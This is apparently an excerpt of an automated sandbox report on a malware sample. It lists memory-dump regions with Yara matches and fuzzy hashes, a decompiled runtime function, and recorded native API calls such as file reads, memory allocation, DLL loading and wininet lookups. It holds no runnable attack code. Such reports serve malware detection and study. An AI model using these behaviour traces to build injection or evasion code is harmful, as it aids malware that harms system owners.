                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 58ae18251e286a487975354e091e46602f0bdb9aa7d09d2dc58ea3121462084e
                                                                                    • Instruction ID: 945a714f111609a382a60f3185fa051e5cbae16d842d86037fbe94dd3358aa8b
                                                                                    • Opcode Fuzzy Hash: 58ae18251e286a487975354e091e46602f0bdb9aa7d09d2dc58ea3121462084e
                                                                                    • Instruction Fuzzy Hash: 9CB09B71D014C5D5D711D7714608717795077D0741F16C061D1020681B4778C495F5B6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 906a469c982250e662efd61cf23d74e787cf510b14f0ac44c018bfee6b3a0a60
                                                                                    • Instruction ID: e840b61699085815638aa39ad4a1992f133c320df279006376f29f74376f1b39
                                                                                    • Opcode Fuzzy Hash: 906a469c982250e662efd61cf23d74e787cf510b14f0ac44c018bfee6b3a0a60
                                                                                    • Instruction Fuzzy Hash: 93900261B0500802D340716A5418706002597D0381F51D021A0014554DCA998A55B6E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0bde3052fe203b7a167b71130aa9e3354b75887ff905c39edf727be5cfd1bd38
                                                                                    • Instruction ID: 3459cbfbc7aab1563a6ebbf1177803b6d0751a19783d8bf6eaf773831e8e53b0
                                                                                    • Opcode Fuzzy Hash: 0bde3052fe203b7a167b71130aa9e3354b75887ff905c39edf727be5cfd1bd38
                                                                                    • Instruction Fuzzy Hash: DA90026174100C02D340716A84147070016D7D0781F51C021A0014554D8A568965B6F1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 30a05049fcf5ae7b5a8513abbccdd28dfe78888f572bc0c5e74b558472f43375
                                                                                    • Instruction ID: f49d7bfcf6e90c3ad42a3b308cf3c38439a6744f94b94af8095fd73bb86069b9
                                                                                    • Opcode Fuzzy Hash: 30a05049fcf5ae7b5a8513abbccdd28dfe78888f572bc0c5e74b558472f43375
                                                                                    • Instruction Fuzzy Hash: 0690027170100452D700A6AA5804A4A411597F0381B51D025A4004554C89948861A161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9c59cca0b02ed253804d8a0bd7c2dfc42e0eb65c358341315efc516856ff3b93
                                                                                    • Instruction ID: 262911b63e56bfc601bb4f549643863c82ecea29b90425f194f4f392652b98b4
                                                                                    • Opcode Fuzzy Hash: 9c59cca0b02ed253804d8a0bd7c2dfc42e0eb65c358341315efc516856ff3b93
                                                                                    • Instruction Fuzzy Hash: C990027170100803D300616A5508707001597D0381F51D421A0414558DDA968851B161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ff9109ca0ce587e58469bc6cd73ebd817e84d91fadef3fd4f9fa22a3a3a8b50c
                                                                                    • Instruction ID: 32fda7d9acaf9286bea4b0fbb87ebe13262a096247df258e93970f8a04dff8f1
                                                                                    • Opcode Fuzzy Hash: ff9109ca0ce587e58469bc6cd73ebd817e84d91fadef3fd4f9fa22a3a3a8b50c
                                                                                    • Instruction Fuzzy Hash: DC90026170504842D300656A5408A06001597D0385F51D021A1054595DCA758851F171
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c53b6d61d5acc9dc22581f5cb4a66740efc29fc4b14538f57c8fbddb726da560
                                                                                    • Instruction ID: b42be46cfa720c2f92852071326484af00ddcc79d18230441227716520098363
                                                                                    • Opcode Fuzzy Hash: c53b6d61d5acc9dc22581f5cb4a66740efc29fc4b14538f57c8fbddb726da560
                                                                                    • Instruction Fuzzy Hash: F590027570504842D700656A5804A87001597D0385F51D421A041459CD8A948861F161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction ID: 09fa16911075f6781cb28dc2b5da37f01064c6c88dde8d930621b0190a18a43c
                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 53%
                                                                                    			E00AAFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                    				void* _t7;
                                                                                    				intOrPtr _t9;
                                                                                    				intOrPtr _t10;
                                                                                    				intOrPtr* _t12;
                                                                                    				intOrPtr* _t13;
                                                                                    				intOrPtr _t14;
                                                                                    				intOrPtr* _t15;
                                                                                    
                                                                                    				_t13 = __edx;
                                                                                    				_push(_a4);
                                                                                    				_t14 =  *[fs:0x18];
                                                                                    				_t15 = _t12;
                                                                                    				_t7 = E00A5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                    				_push(_t13);
                                                                                    				E00AA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                    				_t9 =  *_t15;
                                                                                    				if(_t9 == 0xffffffff) {
                                                                                    					_t10 = 0;
                                                                                    				} else {
                                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                    				}
                                                                                    				_push(_t10);
                                                                                    				_push(_t15);
                                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                    				return E00AA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                    			}











                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AAFDFA
                                                                                    Strings
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AAFE01
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AAFE2B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                    • API String ID: 885266447-3903918235
                                                                                    • Opcode ID: 8450b5c59ca4d8497f15a1edff2d2e58d60486d0c398ff573a9e38aa778ce993
                                                                                    • Instruction ID: 910e455111a69d8b8af75ac2cc0b27ebdce503809dccb35f03805d19378c1c70
                                                                                    • Opcode Fuzzy Hash: 8450b5c59ca4d8497f15a1edff2d2e58d60486d0c398ff573a9e38aa778ce993
                                                                                    • Instruction Fuzzy Hash: 39F0F632600601BFEA241A95DD06F37BF6AEB45730F240715F628565E1EA62F82097F4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Executed Functions

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,01043B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01043B97,007A002E,00000000,00000060,00000000,00000000), ref: 0104820D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: .z`
                                                                                    • API String ID: 823142352-1441809116
                                                                                    • Opcode ID: 59e8da1e01e8f4a3e45be5ef3d0bd5a1d2582d96db85c2409dfd24d5fd510d31
                                                                                    • Instruction ID: 9881a6b67b4cf56447b3095b94f5d8aa0da8534b71bb47ae7d917041bcdecacf
                                                                                    • Opcode Fuzzy Hash: 59e8da1e01e8f4a3e45be5ef3d0bd5a1d2582d96db85c2409dfd24d5fd510d31
                                                                                    • Instruction Fuzzy Hash: A901B2B2241108AFCB18DF98DC85EEB77E9AF8C754F158658FA0DE7240C630E811CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,01043B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01043B97,007A002E,00000000,00000060,00000000,00000000), ref: 0104820D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: .z`
                                                                                    • API String ID: 823142352-1441809116
                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                    • Instruction ID: 4222f29cc92c583b66dbc241cb6904140f4372a854663968a292200174093cc2
                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                    • Instruction Fuzzy Hash: 84F0B2B2201208ABCB08DF88DC84EEB77ADAF8C754F158648FA0D97240C630E811CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtClose.NTDLL(01043D30,?,?,01043D30,00000000,FFFFFFFF), ref: 01048315
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: d9d201fcfb62367edd8ffb5dbc230c269a0991d1455c7d03308f3ae3c26dbc44
                                                                                    • Instruction ID: 8ef1a36df696cf7d0e33211735ec1feeaaa94b040726fecee27b0bb93cf69c0e
                                                                                    • Opcode Fuzzy Hash: d9d201fcfb62367edd8ffb5dbc230c269a0991d1455c7d03308f3ae3c26dbc44
                                                                                    • Instruction Fuzzy Hash: 35F082B6200114ABD710EFD8DC80EEB776DEF88320F14CA59FA5C9B241C630E9118BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(01043D52,5E972F59,FFFFFFFF,01043A11,?,?,01043D52,?,01043A11,FFFFFFFF,5E972F59,01043D52,?,00000000), ref: 010482B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                    • Instruction ID: 0f939ef50450ad873d3cf9aa7d8b8e4c1ed0efc62998516b62c96aea216f6bf4
                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                    • Instruction Fuzzy Hash: 04F0A4B2200208ABCB14DF89DC80EEB77ADAF8C754F158659BA5D97241DA30E811CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(01043D52,5E972F59,FFFFFFFF,01043A11,?,?,01043D52,?,01043A11,FFFFFFFF,5E972F59,01043D52,?,00000000), ref: 010482B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: d0f7569fab7b448f5a1a463fb8156397a3bb805055009ba2f4a72d62b48a18fb
                                                                                    • Instruction ID: 3f8a42615a47347329088df65f1e5ebfc1f9ac8abe18bd50064c2ff89f1f7cfb
                                                                                    • Opcode Fuzzy Hash: d0f7569fab7b448f5a1a463fb8156397a3bb805055009ba2f4a72d62b48a18fb
                                                                                    • Instruction Fuzzy Hash: 1CF0BDB6200104AFCB14DF89DC80DEB77A9FF8C354F158659FA5D97250D630E911CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01032D11,00002000,00003000,00000004), ref: 010483D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                    • Instruction ID: 2c96e0454847604b259ea199f4665684f7308d7d746f1fda28213bc1cc14bbc2
                                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                    • Instruction Fuzzy Hash: 76F015B2200208ABCB14EF89CC80EEB77ADAF88650F118559FE4897241C630F810CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtClose.NTDLL(01043D30,?,?,01043D30,00000000,FFFFFFFF), ref: 01048315
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000007D0), ref: 01046F88
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID: net.dll$wininet.dll
                                                                                    • API String ID: 3472027048-1269752229
                                                                                    • Opcode ID: 896141145925a1edd3a6881bb4eef2b1e85788ba5c32980c1aebebf55a15fbe4
                                                                                    • Instruction ID: 2d7d0cb65f3fe656c1daec39d99a87524df33f7646bf96c94e0a79be7a82d4d3
                                                                                    • Opcode Fuzzy Hash: 896141145925a1edd3a6881bb4eef2b1e85788ba5c32980c1aebebf55a15fbe4
                                                                                    • Instruction Fuzzy Hash: 333180B1601705ABD715DF68C8E0FA7B7F8AB48700F40856DF69A5B240E771A445CBE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000007D0), ref: 01046F88
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID: net.dll$wininet.dll
                                                                                    • API String ID: 3472027048-1269752229
                                                                                    • Opcode ID: 56f74d8fc538ab307462afc5aafb6be5006e2ca43798e8abfce2a013b3dbbe5f
                                                                                    • Instruction ID: 6f28bb97e8979db799ee670a5170ba2c0dcabd65a0437fea92709d08538c129e
                                                                                    • Opcode Fuzzy Hash: 56f74d8fc538ab307462afc5aafb6be5006e2ca43798e8abfce2a013b3dbbe5f
                                                                                    • Instruction Fuzzy Hash: 83219EB1601305ABD711DFA8C8E0FABB7F8AB48704F40806DF6996B281E771A445CBE5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01033B93), ref: 010484FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID: .z`
                                                                                    • API String ID: 3298025750-1441809116
                                                                                    • Opcode ID: 3b8ea5be6fcef70c837e9cd7bbffddb1d3bec4dcf89ef1d557544cfc753c8fd9
                                                                                    • Instruction ID: 60d48f02e989270b65f253894ef8e7fdb38d312c2147dd594b4c56129123d7c8
                                                                                    • Opcode Fuzzy Hash: 3b8ea5be6fcef70c837e9cd7bbffddb1d3bec4dcf89ef1d557544cfc753c8fd9
                                                                                    • Instruction Fuzzy Hash: AFE092B5500215AFC718DF55DC4AE9BB76CEF84300F11CA9AF9485B251C631E814CFB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01033B93), ref: 010484FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID: .z`
                                                                                    • API String ID: 3298025750-1441809116
                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                    • Instruction ID: d3dce581754b78596b36a8bb79e538c098f16331fc7f5bad01cbbf03ffc841df
                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                    • Instruction Fuzzy Hash: 59E04FB12002046BD714EF99CC44EE777ACEF88750F018555FD4857241C630F910CAF0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 010372BA
                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 010372DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: 0d251a6efcd9bab6f901e207b7ee06c09f46ef66761929ea5bbfdc0c346a625e
                                                                                    • Instruction ID: e809b3653a9171dbcff464c9ca7d2d20a5f66c38560f49929ab25ce4f1496a56
                                                                                    • Opcode Fuzzy Hash: 0d251a6efcd9bab6f901e207b7ee06c09f46ef66761929ea5bbfdc0c346a625e
                                                                                    • Instruction Fuzzy Hash: 23012671A8032977E720A7948C42FFF776C9B50B50F040068FF84BA1C0E6D4690683F5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 01039B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction ID: 2006375c888aeacfbc6a3043e441f46e3e15ebaf223dd4dd062f63b11992a28e
                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction Fuzzy Hash: 78011EB5E4020EBBDF14DBE4DD81FDEB7B89B54208F0041A5AA4897281F671E714CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
